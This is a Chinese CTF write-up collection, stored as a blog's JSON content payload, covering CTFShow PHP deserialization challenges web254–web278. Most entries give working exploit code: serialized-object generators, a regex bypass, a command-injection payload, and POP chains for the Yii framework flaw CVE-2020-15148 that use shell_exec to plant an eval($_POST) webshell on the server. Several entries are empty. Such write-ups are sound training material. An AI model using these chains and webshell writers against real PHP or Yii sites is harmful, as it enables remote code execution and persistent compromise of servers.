[{"data":1,"prerenderedAt":614},["ShallowReactive",2],{"content:\u002F2026\u002Fctfshow-web-php-writeup":3,"surround:\u002F2026\u002Fctfshow-web-php-writeup":608},{"id":4,"title":5,"body":6,"categories":585,"date":587,"description":588,"draft":589,"extension":590,"image":591,"meta":592,"navigation":594,"path":595,"permalink":596,"published":596,"readingTime":597,"recommend":596,"references":596,"seo":602,"sitemap":603,"stem":604,"tags":605,"type":606,"updated":587,"__hash__":607},"content\u002Fposts\u002F2026\u002FCTFShow Web入门 PHP反序列化 Writeup 合集.md","CTFShow Web入门 PHP反序列化 Writeup 合集",{"type":7,"value":8,"toc":556},"minimark",[9,13,22,32,35,38,57,67,74,76,79,90,96,103,105,108,127,133,140,142,145,156,162,169,171,174,177,179,182,185,192,194,197,213,220,226,232,238,245,247,250,253,261,268,270,273,280,282,285,292,297,304,306,309,315,321,328,330,333,343,349,356,358,361,372,378,387,393,400,406,413,415,418,421,427,434,436,439,442,449,451,454,456,463,465,468,470,472,475,477,479,482,484,486,489,491,493,496,520,528,535,537,540,542,544,547,549,551,554],[10,11,12],"h2",{"id":12},"web254",[14,15,16,17,21],"p",{},"简单的逻辑验证，只需要账号密码为 ",[18,19,20],"code",{"code":20},"xxxxxx"," 即可，直接用 GET 传参。",[14,23,24,28,29],{},[25,26,27],"strong",{},"flag",": ",[18,30,31],{"code":31},"ctfshow{0148479c-c0d7-410f-ad8d-09d1359f918d}",[33,34],"hr",{},[10,36,37],{"id":37},"web255",[14,39,40,41,44,45,48,49,52,53,56],{},"从 cookie 中获取 user，然后反序列化，再通过 ",[18,42,43],{"code":43},"login","、",[18,46,47],{"code":47},"checkVip"," 函数判断。只需生成一个 ",[18,50,51],{"code":51},"isVip"," 为 ",[18,54,55],{"code":55},"true"," 的对象序列化字符串。",[58,59,65],"pre",{"className":60,"code":62,"language":63,"meta":64},[61],"language-php","\u003C?php\nclass ctfShowUser{\n    public $isVip;\n    public $username='xxxxxx';\n    public $password='xxxxxx';\n}\n$a = new ctfShowUser();\n$a->isVip = true;\necho 
urlencode(serialize($a));\n?>\n","php","",[18,66,62],{"__ignoreMap":64},[14,68,69,28,71],{},[25,70,27],{},[18,72,73],{"code":73},"ctfshow{e6be0932-e4b6-4048-945e-439329770917}",[33,75],{},[10,77,78],{"id":78},"web256",[14,80,81,82,85,86,89],{},"在上一题的基础上加了一个判断，要求反序列化后的 ",[18,83,84],{"code":84},"username"," 和 ",[18,87,88],{"code":88},"password"," 不相等。",[58,91,94],{"className":92,"code":93,"language":63,"meta":64},[61],"\u003C?php\nclass ctfShowUser{\n    public $isVip;\n    public $username='xxxxxx';\n    public $password='xxxxx';\n}\n$a = new ctfShowUser();\n$a->isVip = true;\necho urlencode(serialize($a));\n?>\n",[18,95,93],{"__ignoreMap":64},[14,97,98,28,100],{},[25,99,27],{},[18,101,102],{"code":102},"ctfshow{cc7c465f-5f0a-4c41-acdb-8cfe5bd6ceab}",[33,104],{},[10,106,107],{"id":107},"web257",[14,109,110,111,114,115,118,119,122,123,126],{},"只需修改 ",[18,112,113],{"code":113},"class"," 值为 ",[18,116,117],{"code":117},"backDoor","，触发 ",[18,120,121],{"code":121},"__destruct"," 魔术方法，从而调用 ",[18,124,125],{"code":125},"getinfo"," 函数，进行 RCE。",[58,128,131],{"className":129,"code":130,"language":63,"meta":64},[61],"\u003C?php\nclass backDoor{\n    private $code=\"system('cat flag.php');\";\n\n}\nclass ctfShowUser\n{\n\n    private $class;\n    public function __construct(){\n        $this->class= new backDoor();\n    }\n}\n$c = new ctfShowUser();\necho urlencode(serialize($c));\n",[18,132,130],{"__ignoreMap":64},[14,134,135,28,137],{},[25,136,27],{},[18,138,139],{"code":139},"ctfshow{e33eafd5-3718-4e1c-abe4-2336cbdf8700}",[33,141],{},[10,143,144],{"id":144},"web258",[14,146,147,148,151,152,155],{},"在上一道基础上加了正则，可以用 ",[18,149,150],{"code":150},"O:+"," 绕过。注意这道题成员属性都是 ",[18,153,154],{"code":154},"public","。",[58,157,160],{"className":158,"code":159,"language":63,"meta":64},[61],"\u003C?php\nclass backDoor{\n    public $code=\"system('cat flag.php');\";\n}\nclass ctfShowUser\n{\n    public $class;\n    public function __construct(){\n        $this->class= new backDoor();\n    
}\n}\n$c = new ctfShowUser();\n$a = serialize($c);\n$a=str_replace(\"O:\",\"O:+\",$a);\necho urlencode($a);\n",[18,161,159],{"__ignoreMap":64},[14,163,164,28,166],{},[25,165,27],{},[18,167,168],{"code":168},"ctfshow{9ce14fde-41cc-4301-8097-d78af496d7bc}",[33,170],{},[10,172,173],{"id":173},"web259",[14,175,176],{},"（暂无 wp）",[33,178],{},[10,180,181],{"id":181},"web260",[14,183,184],{},"不理解什么意义，直接传参。",[14,186,187,28,189],{},[25,188,27],{},[18,190,191],{"code":191},"ctfshow{61966581-87eb-49dd-b440-501855c26f7c}",[33,193],{},[10,195,196],{"id":196},"web261",[14,198,199,200,85,203,206,207,209,210,212],{},"如果类中同时定义了 ",[18,201,202],{"code":202},"__unserialize()",[18,204,205],{"code":205},"__wakeup()"," 两个魔术方法，则只有 ",[18,208,202],{"code":202}," 方法会生效，",[18,211,205],{"code":205}," 方法会被忽略。",[14,214,215,216,219],{},"利用 ",[18,217,218],{"code":218},"file_put_contents"," 函数。因为是弱比较，发现：",[58,221,224],{"className":222,"code":223,"language":63,"meta":64},[61],"\u003C?php\nvar_dump(0x36d == \"877.php\");  \u002F\u002F true\n?>\n",[18,225,223],{"__ignoreMap":64},[58,227,230],{"className":228,"code":229,"language":63,"meta":64},[61],"\u003C?php\nclass ctfshowvip{\n    public $username;\n    public $password;\n}\n$a = new ctfshowvip();\n$a->username = '877.php';\n$a->password = '\u003C?php eval($_GET[1]);?>';\necho urlencode(serialize($a));\n?>\n",[18,231,229],{"__ignoreMap":64},[14,233,234,235],{},"然后访问 ",[18,236,237],{"code":237},"877.php?1=system('cat \u002Fflag_is_here');",[14,239,240,28,242],{},[25,241,27],{},[18,243,244],{"code":244},"ctfshow{90103421-62cf-46f3-8519-7f3b8858da69}",[33,246],{},[10,248,249],{"id":249},"web262",[14,251,252],{},"字符增多型的字符串逃逸，需要逃逸 27 个字符，只需把 fuck 重复 27 
次。",[58,254,259],{"className":255,"code":257,"language":258},[256],"language-text","f=s&m=s&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck\";s:5:\"token\";s:5:\"admin\";}\n","text",[18,260,257],{"__ignoreMap":64},[14,262,263,28,265],{},[25,264,27],{},[18,266,267],{"code":267},"ctfshow{353f6df8-1fa5-47ba-ac90-5d09fbbc7f75}",[33,269],{},[10,271,272],{"id":272},"web263",[14,274,275,276,279],{},"访问 ",[18,277,278],{"code":278},"www.zip"," 获取源码。",[33,281],{},[10,283,284],{"id":284},"web264",[14,286,287,288,291],{},"和 web262 一样，用字符串逃逸，另外访问 ",[18,289,290],{"code":290},"message.php"," 时加上 cookie。",[58,293,295],{"className":294,"code":257,"language":258},[256],[18,296,257],{"__ignoreMap":64},[14,298,299,28,301],{},[25,300,27],{},[18,302,303],{"code":303},"ctfshow{e659f098-7102-4c3c-bf0f-11038cf02d99}",[33,305],{},[10,307,308],{"id":308},"web265",[14,310,311,312,155],{},"使用引用 ",[18,313,314],{"code":314},"&",[58,316,319],{"className":317,"code":318,"language":63,"meta":64},[61],"\u003C?php\nclass ctfshowAdmin{\n    public $token;\n    public $password;\n}\n$a = new ctfshowAdmin();\n$a->token = &$a->password;\necho urlencode(serialize($a));\n?>\n",[18,320,318],{"__ignoreMap":64},[14,322,323,28,325],{},[25,324,27],{},[18,326,327],{"code":327},"ctfshow{a4ad29b0-b250-414b-8e18-d5cbe006f69c}",[33,329],{},[10,331,332],{"id":332},"web266",[14,334,335,336,339,340,342],{},"需要构造一个 ",[18,337,338],{"code":338},"ctfshow"," 类触发 ",[18,341,121],{"code":121}," 魔术方法，输出 flag。PHP 的类名不区分大小写，因此可以通过改变类名的大小写绕过正则。",[58,344,347],{"className":345,"code":346,"language":63,"meta":64},[61],"\u003C?php\nclass Ctfshow{\n}\n$a = new Ctfshow();\necho serialize($a);\n?>\n",[18,348,346],{"__ignoreMap":64},[14,350,351,28,353],{},[25,352,27],{},[18,354,355],{"code":355},"ctfshow{6479dadd-1745-491d-a222-7f46432c04a4}",[33,357],{},[10,359,360],{"id":360},"web267",[14,362,363,364,367,368,371],{},"查看源码发现是 Yii 框架，用 ",[18,365,366],{"code":366},"admin\u002Fadmin"," 登录，进入 about 
页面，查看源码发现 ",[18,369,370],{"code":370},"\u003C!--?view-source -->"," 提示，用 GET 传参后出现：",[58,373,376],{"className":374,"code":375,"language":63,"meta":64},[61],"\u002F\u002F\u002Fbackdoor\u002Fshell\nunserialize(base64_decode($_GET['code']))\n",[18,377,375],{"__ignoreMap":64},[14,379,380,381,384,385,155],{},"根据 CVE-2020-15148，直接用已有的 POP 链打。这里的路由已经提示是 ",[18,382,383],{"code":383},"backdoor\u002Fshell","，所以直接传 ",[18,386,18],{"code":18},[58,388,391],{"className":389,"code":390,"language":63,"meta":64},[61],"\u003C?php\nnamespace yii\\rest{\n    class IndexAction\n    {\n        public $checkAccess;\n        public $id;\n        public function __construct(){\n            $this->checkAccess = 'phpinfo';\n            $this->id = '1';            \u002F\u002F命令执行\n        }\n    }\n}\nnamespace Faker {\n    use yii\\rest\\IndexAction;\n    class Generator\n    {\n        protected $formatters;\n        public function __construct()\n        {\n            $this->formatters['close'] = [new IndexAction(), 'run'];\n        }\n    }\n}\nnamespace yii\\db{\n    use Faker\\Generator;\n    class BatchQueryResult\n    {\n        private $_dataReader;\n        public function __construct()\n        {\n            $this->_dataReader=new Generator();\n        }\n    }\n}\nnamespace{\n    use yii\\db\\BatchQueryResult;\n    echo base64_encode(serialize(new BatchQueryResult()));\n}\n",[18,392,390],{"__ignoreMap":64},[14,394,395,396,399],{},"有的函数没回显，选择写入 shell，然后访问 ",[18,397,398],{"code":398},"1.php","，用 POST 传参即可。",[58,401,404],{"className":402,"code":403,"language":63,"meta":64},[61],"$this->checkAccess = 'shell_exec';\n$this->id = 'echo \"\u003C?php eval(\\$_POST[1]);phpinfo();?>\" > \u002Fvar\u002Fwww\u002Fhtml\u002Fbasic\u002Fweb\u002F1.php';\n",[18,405,403],{"__ignoreMap":64},[14,407,408,28,410],{},[25,409,27],{},[18,411,412],{"code":412},"ctfshow{d0518711-8913-429e-8191-457e123ce63c}",[33,414],{},[10,416,417],{"id":417},"web268",[14,419,420],{},"上条被过滤了，换一条 POP 
链。",[58,422,425],{"className":423,"code":424,"language":63,"meta":64},[61],"\u003C?php\nnamespace yii\\rest {\n    class Action\n    {\n        public $checkAccess;\n    }\n    class IndexAction\n    {\n        public function __construct($func, $param)\n        {\n            $this->checkAccess = $func;\n            $this->id = $param;\n        }\n    }\n}\nnamespace yii\\web {\n    abstract class MultiFieldSession\n    {\n        public $writeCallback;\n    }\n    class DbSession extends MultiFieldSession\n    {\n        public function __construct($func, $param)\n        {\n            $this->writeCallback = [new \\yii\\rest\\IndexAction($func, $param), \"run\"];\n        }\n    }\n}\nnamespace yii\\db {\n    use yii\\base\\BaseObject;\n    class BatchQueryResult\n    {\n        private $_dataReader;\n        public function __construct($func, $param)\n        {\n            $this->_dataReader = new \\yii\\web\\DbSession($func, $param);\n        }\n    }\n}\nnamespace {\n    $exp = new \\yii\\db\\BatchQueryResult('shell_exec', \"echo '\u003C?php eval(\\$_POST[1]);phpinfo();?>' > \u002Fvar\u002Fwww\u002Fhtml\u002Fbasic\u002Fweb\u002F1.php\");\n    echo(base64_encode(serialize($exp)));\n}\n",[18,426,424],{"__ignoreMap":64},[14,428,429,28,431],{},[25,430,27],{},[18,432,433],{"code":433},"ctfshow{9a563a63-37ae-4e9a-b2ba-8b5783a9a336}",[33,435],{},[10,437,438],{"id":438},"web269",[14,440,441],{},"268 
的链子就能用。",[14,443,444,28,446],{},[25,445,27],{},[18,447,448],{"code":448},"ctfshow{bdb360ee-84cc-4495-aeef-d379ff1f113e}",[33,450],{},[10,452,453],{"id":453},"web270",[14,455,441],{},[14,457,458,28,460],{},[25,459,27],{},[18,461,462],{"code":462},"ctfshow{7a947d40-fed5-41e9-aec5-32a5b8cf2aff}",[33,464],{},[10,466,467],{"id":467},"web271",[14,469,176],{},[33,471],{},[10,473,474],{"id":474},"web272",[14,476,176],{},[33,478],{},[10,480,481],{"id":481},"web273",[14,483,176],{},[33,485],{},[10,487,488],{"id":488},"web274",[14,490,176],{},[33,492],{},[10,494,495],{"id":495},"web275",[14,497,498,499,52,502,504,505,508,509,512,513,516,517,155],{},"需要 ",[18,500,501],{"code":501},"checkevil()",[18,503,55],{"code":55},"，不进入 ",[18,506,507],{"code":507},"if"," 语句，利用 ",[18,510,511],{"code":511},"system"," 进行 RCE。再加一个 ",[18,514,515],{"code":515},";"," 隔断 ",[18,518,519],{"code":519},"rm",[14,521,522,28,525],{},[25,523,524],{},"payload",[18,526,527],{"code":527},"?fn=php;tac flag.php",[14,529,530,28,532],{},[25,531,27],{},[18,533,534],{"code":534},"ctfshow{bfb60e1a-c706-4c17-bfdc-516b1a7fad8c}",[33,536],{},[10,538,539],{"id":539},"web276",[14,541,176],{},[33,543],{},[10,545,546],{"id":546},"web277",[14,548,176],{},[33,550],{},[10,552,553],{"id":553},"web278",[14,555,176],{},{"title":64,"searchDepth":557,"depth":557,"links":558},4,[559,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584],{"id":12,"depth":560,"text":12},2,{"id":37,"depth":560,"text":37},{"id":78,"depth":560,"text":78},{"id":107,"depth":560,"text":107},{"id":144,"depth":560,"text":144},{"id":173,"depth":560,"text":173},{"id":181,"depth":560,"text":181},{"id":196,"depth":560,"text":196},{"id":249,"depth":560,"text":249},{"id":272,"depth":560,"text":272},{"id":284,"depth":560,"text":284},{"id":308,"depth":560,"text":308},{"id":332,"depth":560,"text":332},{"id":360,"depth":560,"text":360},{"id":417,"depth":560,"text":417},{"id":438,"depth":560,"text":438},{"id":453,"depth":560,"t
ext":453},{"id":467,"depth":560,"text":467},{"id":474,"depth":560,"text":474},{"id":481,"depth":560,"text":481},{"id":488,"depth":560,"text":488},{"id":495,"depth":560,"text":495},{"id":539,"depth":560,"text":539},{"id":546,"depth":560,"text":546},{"id":553,"depth":560,"text":553},[586],"CTF","2026-06-16 08:59:34","整理自 web254 ~ web278",false,"md","\u002F2026\u002FCTFShow Web入门 PHP反序列化 Writeup 合集\u002Fcover.jpg",{"slots":593},{},true,"\u002F2026\u002Fctfshow-web-php-writeup",null,{"text":598,"minutes":599,"time":600,"words":601},"4 min read",3.81,228600,762,{"title":5,"description":588},{"loc":595},"posts\u002F2026\u002FCTFShow Web入门 PHP反序列化 Writeup 合集",[],"tech","Y5fURP0WcAI1Tc80b75D3HbfRMSSK3eZrpcDiM-B2IQ",[609,596],{"title":610,"path":611,"stem":612,"date":613,"type":606,"children":-1},"CVE-2020-15148 反序列化漏洞复现","\u002F2026\u002Fcve-2020-15148","posts\u002F2026\u002FCVE-2020-15148 反序列化漏洞复现","2026-06-15 19:01:17",1781603330216]